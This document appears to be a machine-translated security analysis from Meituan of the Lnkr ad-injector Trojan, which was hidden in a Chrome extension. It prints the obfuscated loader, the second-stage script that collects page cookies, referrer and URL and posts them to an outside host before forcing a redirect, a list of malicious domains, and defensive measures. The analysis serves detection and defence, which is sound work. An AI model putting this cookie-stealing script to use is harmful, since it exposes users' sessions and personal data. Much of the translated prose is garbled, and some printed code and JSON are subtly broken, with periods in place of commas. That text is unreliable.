takeaway
This paper analyzes Lnkr Trojan horse from the perspectives of hacking attack methods, malicious Trojan horse behaviors, monitoring and defense schemes, etc. Such Trojan horse has a wide range of influence and diversified attack methods, but there are few relevant information in China at present. It is hoped that the practical experience and summary in this paper can be helpful to students engaged in relevant security detection.
I. Overview of the event
In October 2020, meituan security operation platform found malicious JavaScript requests in traffic, and the Information security Department immediately began emergency handling after receiving the alarm. By checking the network environment and access logs, the malicious requests were finally locked because malicious plug-ins were installed in Chrome browser. This malicious JavaScript file can steal cookies and force users to jump to malicious pornographic sites and promotional links. Combined with meituan threat intelligence big data, it is found that this plug-in has the same characteristics as Lnkr Ad Injector Trojan.
Such Trojan horses are spread in a variety of ways, such as browser plug-ins and Broken Link (Broken Link) Hijacking (Hijacking), which implant malicious code into pages, seriously affecting users’ access and stealing user data. After tracking analysis found that a number of large domestic Internet sites (Alexa global ranking top 600) were infected, affecting the Internet security of hundreds of millions of netizens, the major platform to their own system third-party loading source and internal terminal equipment to check, to avoid such Trojan attacks.
Ii. Tracing process
2.1 The Secure Operation Platform generates an exception alarm
Chrome sandbox detects malicious JavaScript files and generates an exception alarm:
Based on the alarm information, the basic attack behaviors are as follows:
- User access normal page;
- Page loading external JavaScript file (A) : s3.amazonaws.com/js-static/1…
- A loading the second JavaScript file (B) : 18 ced489204 countsource. Cool /…
- B contains malicious codes and sends sensitive information such as cookies to remote domain names.
2.2 Analyzing the Attack Path
Based on the trigger page and network environment information, troubleshoot traffic hijacking and XSS attacks, and guess the possible cause is browser plug-ins or malicious software.
After sandbox analysis of all Chrome plug-ins on the faulty device, the code of a Chrome plug-in named Vysor is found to be malicious. The detection results are as follows:
{
"call_window_location": {
"info": "get document.location"."capture": []},"call_document_createElement": {
"info": "call document.createElement, create script element"."capture": [
"create element elementName:FIELDSET"."create element elementName:FIELDSET"."create element elementName:FIELDSET"."create element elementName:FIELDSET"."create element elementName:FIELDSET"."create element elementName:INPUT"."create element elementName:FIELDSET"."create element elementName:FIELDSET"."create element elementName:FIELDSET"."create element elementName:FIELDSET"."create element elementName:FIELDSET"."create element elementName:SCRIPT"."create element elementName:LINK"]},"call_document_removeChild": {
"info": "call document.removeChild"."capture": [
"remove element {elementName:fieldset}"."remove element {elementName:fieldset}"."remove element {elementName:fieldset}"]},"set_scriptSrcValue": {
"info": "set script src unsafe value"."capture": [
"//s3.amazonaws.com/js-static/18ced489204f8ff908.js"]}}Copy the code
You can see the plug-in code to create a script tags, and then set the SRC attribute of the script tag for / / s3.amazonaws.com/js-static/18ced489204f8ff908.js.
2.3 Analysis of plug-in malicious code
In order to further study the characteristics of the Trojan of the organization, we conducted a manual analysis of the code of the malicious plug-in. Malicious plug-ins have a large amount of code, a chaotic structure, and a lot of interfering code.
The malicious code presets lots of meaningless strings to construct Payload.
These strings are converted through a series of methods to construct the statement document’createElement’ that creates the script tag, and the docType is the created script object.
The SRC attribute of the script object is then assigned. In the addHandler method, the cl parameter is passed by elem, which contains the SRC string, via cl[0].split(‘>’).slice(2, 3) to fetch the keyword SRC, Tag is the doctype variable, which is the script object. In the section that constructs the SRC value, you can see that in the constant there is a string that is partially base64 like:
mawaid = '^\\%|PCQxPjwkMT5zM|y5hbWF6b25hd3Mu|? : ^ ^ \ \ \ \] +? :\\%\\.*\t'
Copy the code
Malicious code uses the string in conjunction with other preset variables to perform a series of conversions, Eventually form the base64 PCQxPjwkMT5zMy5hbWF6b25hd3MuY29tPCQxPmpzLXN0YXRpYzwkMT4xOGNlZDQ4OTIwNGY4ZmY5MDguanM loading address:
Base64 createLinkPseudo way solution, after the replace form / / s3.amazonaws.com/js-static/18ced489204f8ff908.js malicious address.
S3.amazonaws.com/js-static/18ced489204f8ff908.js’s main purpose is to load the next layer of malicious Javascript file (/ / countsource. Cool / 18 ced489204f8ff908. Js), The code is as follows:
(function(){var a=document.createElement("script"); a.src="//countsource.cool/18ced489204f8ff908.js"; (document.head||document.documentElement).appendChild(a)})();;
Copy the code
/ / countsource. Cool / 18 ced489204f8ff908. Js file contents as follows:
(function () {
function initXMLhttp() {
var xmlhttp;
if (window.XMLHttpRequest) {
xmlhttp = new XMLHttpRequest();
} else {
xmlhttp = new ActiveXObject("Microsoft.XMLHTTP");
}
return xmlhttp;
}
function minAjax(config) {
if(! config.url) {return;
}
if(! config.type) {return;
}
if(! config.method) { config.method =true;
}
if(! config.debugLog) { config.debugLog =false;
}
var sendString = [],
sendData = config.data;
if (typeof sendData === "string") {
var tmpArr = String.prototype.split.call(sendData, '&');
for (var i = 0, j = tmpArr.length; i < j; i++) {
var datum = tmpArr[i].split('=');
sendString.push(encodeURIComponent(datum[0]) + "=" + encodeURIComponent(datum[1])); }}else if (typeof sendData === 'object' && !(sendData instanceof String)) {
for (var k in sendData) {
var datum = sendData[k];
if (Object.prototype.toString.call(datum) == "[object Array]") {
for (var i = 0, j = datum.length; i < j; i++) {
sendString.push(encodeURIComponent(k) + "[] =" + encodeURIComponent(datum[i])); }}else {
sendString.push(encodeURIComponent(k) + "=" + encodeURIComponent(datum));
}
}
}
sendString = sendString.join('&');
if (window.XDomainRequest) {
var xmlhttp = new window.XDomainRequest();
xmlhttp.onload = function () {
if(config.success) { config.success(xmlhttp.responseText); }}; xmlhttp.open("POST", config.url);
xmlhttp.send(sendString);
} else {
var xmlhttp = initXMLhttp();
xmlhttp.onreadystatechange = function () {
if (xmlhttp.readyState == 4 && xmlhttp.status == 200) {
if(config.success) { config.success(xmlhttp.responseText, xmlhttp.readyState); }}else{}}if (config.type == "GET") {
xmlhttp.open("GET", config.url + "?" + sendString, config.method);
xmlhttp.send();
}
if (config.type == "POST") {
xmlhttp.open("POST", config.url, config.method);
xmlhttp.setRequestHeader("Content-type"."application/x-www-form-urlencoded");
xmlhttp.send(sendString);
}
}
}
dL();
function dL() {
var host = 'http://press.cdncontentdelivery.com/f';
var config = {
url: host + "/stats.php".type: "POST".data: {
vbase: document.baseURI,
vhref: location.href,
vref: document.referrer,
k: "Y291bnRzb3VyY2UuY29vbA==".ck: document.cookie,
t: Math.floor(new Date().getTime() / 1000),
tg: ""
},
success: onSuccessCallback
};
function bl(resp) {!function (dr) {
function t() {
return!!!!!localStorage && localStorage.getItem(a)
}
function e() {
o(),
parent.top.window.location.href = c
}
function o() {
var t = r + i;
if (localStorage) {
localStorage.setItem(a, t)
}
}
function n() {
if (t()) {
var o = localStorage && localStorage.getItem(a);
r > o && e()
} else e()
}
var a = "MenuIdentifier",
r = Math.floor((new Date).getTime() / 1e3),
c = dr,
i = 86400;
n()
}(resp);
}
function onSuccessCallback(response) {
if (response && response.indexOf('http') > -1) {
bl(response);
}
}
minAjax(config);
}
})();
Copy the code
This file is the code that truly implements malicious behavior. This part of the code is not confused, encrypted, or added to other meaningless code interference analysis, so the malicious behavior can be clearly seen:
- Get current page Cookie, ck parameter;
- Get the current page Referrer;
- Get the current page Location;
- Using XMLHttpRequest will obtain the data to send to press.cdncontentdelivery.com/f/stats.php…
- Jump using the onSuccessCallback method.
The Cookie is sent to the remote receiver address, and then onSuccessCallback returns the content to complete the jump.
2.4 Conduct in-depth investigation through discovered IoC
According to the above features, a large number of Lnkr Trojan related domain names and plug-ins are found, some of which do not appear in the known threat intelligence. Further analysis shows that mobile terminal devices also trigger malicious requests.
In addition, we also found that many large sites in China have introduced Lnkr Trojan horses on their own reference resources. If users access these sites, the Cookie information will be directly sent to the remote end, posing a very high security risk. If a site has malicious resources, it is likely that a Broken Link Hijacking (Hijacking) attack will rob the site of expired domain names while accessing existing resources.
Third, summary
3.1 Malicious Domain Name
The following lists the malicious domain names found in the detection:
- mirextpro.com
- browfileext.com
- nextextlink.com
- lisegreen.biz
- makesure.biz
- clipsold.com
- comtakelink.xyz
- protesidenext.com
- promfflinkdev.com
- rayanplug.xyz
- countsource.cool
- blancfox.com
- skipush1.bbn.com.cn
- donewrork.org
- loungesrc.net
- higedev.cool
- s3.amazonaws.com/cashe-js/
- s3.amazonaws.com/js-cache/
- s3.amazonaws.com/jsfile/
- s3.amazonaws.com/cashe-js/
- Cdngateway.net (domain name for receiving cookies)
- Sslproviders.net (Domain name for receiving cookies)
- Cdncontentdelivery.com (Domain name for receiving cookies)
3.2 Malicious Plug-ins
Malicious plug-ins containing Lnkr Trojan horse features are found:
Screenshots of some malicious plug-ins:
Four, checking
What are the harms caused by Lnkr Trojan horse?
Cdngateway.net, one of the core domain names of Lnkr Trojan, ranks 8900 in global domain name traffic. From the perspective of traffic source, traffic brought by external websites accounts for 65.48% of the total traffic, indicating that its attack range is very wide and the number of applications and users affected by it is also very large.
This type of Trojan horse is harmful to both external users and internal employees.
As for external users, if enterprises do not strictly control the loading of third-party resources, the hacker system uses Broken Link Hijacking to implant malicious code while loading resources, which will seriously affect user experience, information security and corporate image.
From the perspective of internal staff, the traditional terminal security equipment such as soft, EDR not well identify such malicious plug-ins, the attacker by spreading malicious browser plug-in control staff browser loads remote malicious resources, not only can be used for advertising injection, compared with other attacks on the browser, can achieve a more stable, In the malicious requests blocked by CSP history, we also find that in addition to stealing Cookie information, malicious codes also steal page text information, which is very likely to contain a large number of users, orders and other sensitive information in the internal platform of the enterprise.
How do I detect such Trojan implantation?
Against malicious browser plug-ins, in terms of detection for the code to do static analysis cost is larger, the trigger malicious request Payload is through a lot of code conversion, splicing, in regular matching and structure, and through a lot of no practical significance, the method of the dynamic analysis, because of the Chrome plug-in code invokes the Chrome backend API, In a normal sandbox environment, you can fail to call the API and exit with an error. In addition, many malicious activities need to trigger specific events to enter the process of constructing malicious Payload, for example, chrome. Tabs. OnUpdated.
You can use the following methods to detect and defend browser plug-in security:
- Do not install plug-ins that are not available in the Chrome App Store (except those developed in-house).
- Json file, manfiest. Json file application permissions are relatively sensitive, such as cookies, Tabs, webRequest and so on;
- Using content security policy (CSP) to intercept or monitor the request initiated by the application page, combined with static and dynamic analysis technology, judge the behavior of JavaScript files;
- Periodically scan browser plug-ins with browser sandbox and EDR.
- Build the detection capability of the network layer to deal with malicious requests in a timely manner.
Whether the business system itself loads malicious resources:
- Strictly control the third-party resources loaded by the system;
- Interception or monitoring of page-triggered requests through content security policies (CSP).
conclusion
Black production organization use these Trojan malicious drainage, steal the user information and so on, brings to the user access to security risks, also harm to their own image, in the HTTPS scenarios, while eliminating the user access to risk being held hostage on a link, but the client access environment security, to ensure that the user information is reliable, has not been tampered with, Further protection is still needed. I hope this article can give you some help or inspiration.
About Meituan Information Security Department
Recruitment information
At present, meituan security team is trying to build a deep application security system of language virtual machine — basic service — upper application. Students who are interested in r&d security are urgently needed to join us! If you are interested in the job and meet the following requirements, please send your resume to [email protected] (email subject: R&D Security Specialist – City – Meituan SRC).
| want to read more technical articles, please pay close attention to Meituan technical team (meituantech) WeChat public official.
| in the public, the menu bar reply goodies for [2019], [2018] special purchases, goodies for [2017], [method] the key word, can see Meituan technology team calendar year essay collection.